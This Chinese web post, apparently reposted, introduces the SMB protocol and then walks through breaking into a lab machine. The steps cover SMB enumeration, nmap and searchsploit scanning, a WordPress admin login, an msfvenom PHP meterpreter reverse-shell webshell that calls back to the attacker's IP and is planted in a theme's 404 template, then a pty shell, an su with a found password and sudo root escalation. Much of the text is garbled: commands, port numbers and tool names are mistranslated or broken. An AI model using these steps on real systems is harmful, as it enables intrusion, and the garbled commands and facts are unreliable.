什么是SMB协议?与FTP协议有什么不同?,SMB协议端口

　　SMB(ServerMessage Block)通信协议是微软和英特尔在1987年制定的。主要用作微软网络的通信协议。

　　端口139(TCP)-文件和打印共享；Smbd(基于SMB(服务器消息端口445 (TCP)-NetBIOS服务在windos 2000及更高版本中使用该端口，(CIFS，是SMB协议扩展到互联网后的互联网文件共享块)协议，主要用于局域网，文件共享协议)

　　39和445是smb协议。

　　306开发mysql服务

　　1对于smb协议，请使用空白密码。

　　smbclient -L ip

　　smbclient \\ip\$share

　　Ipc是一个空文件，打印机没有访问它的权限。

　　获取敏感文件

　　-gedit是Linux环境下的文本编辑器，类似于windows中的写字板程序。不需要特别复杂的编程环境，更适合作为基本的文本编辑器。

　　306端口开放mysql服务

　　不允许远程登录mysql。

　　然后通过ssh协议登录主机。

　　2分析smb协议的远程溢出漏洞

　　Searchsploit samba版本号

　　nmap -A -v -T4

　　查找samba版本号

　　根据http协议漏洞分析

　　用浏览器查网站，用Dirb和Nikto检测，找到突破点，后台登录目标，上传webshell。

　　迪拉姆http://192

　　==目录：http://192 . 168 . 1 . 108/WordPress/WP-admin/

　　登录后台。

　　制作webshell

　　MSF venom-p PHP/meter preter/reverse _ tcplhost=攻击机IP port=4444-f raw/root/destktop/shell . PHP

　　做一个。exe文件，然后将其发送到目标机器Windows。运行后，可以使用msfconsole连接msfvenom服务来控制kali linux上的目标机器。

　　进入控制台

　　输入run，然后打开网页并点击外观编辑器404模板。

　　将shell.php文件中的代码复制到404，上传成功后会显示出来。

　　然后通过固定路径http://射击场IP/WordPress/WP-content/themes/twenty fifth/404 . PHP访问webshell。

　　然后输入的id反弹回shell。

　　下一步也一样，优化终端(python-c " import pty；Pty.spawn(/滑稽外套/巴什) ")

　　使用cat /etc/passwd/检查当前系统的其他用户名(注意主目录)并查找togie用户。su togie切换到togie目录，密码用之前找到的12345成功登录。

　　或者切换到root权限，使用sudo -l查看苏灿执行什么操作，然后使用sudo su提升权限。

　　最后在root找到proof.txt。

郑重声明：本文由网友发布，不代表盛行IT的观点，版权归原作者所有，仅为传播更多信息之目的，如有侵权请联系，我们将第一时间修改或删除，多谢。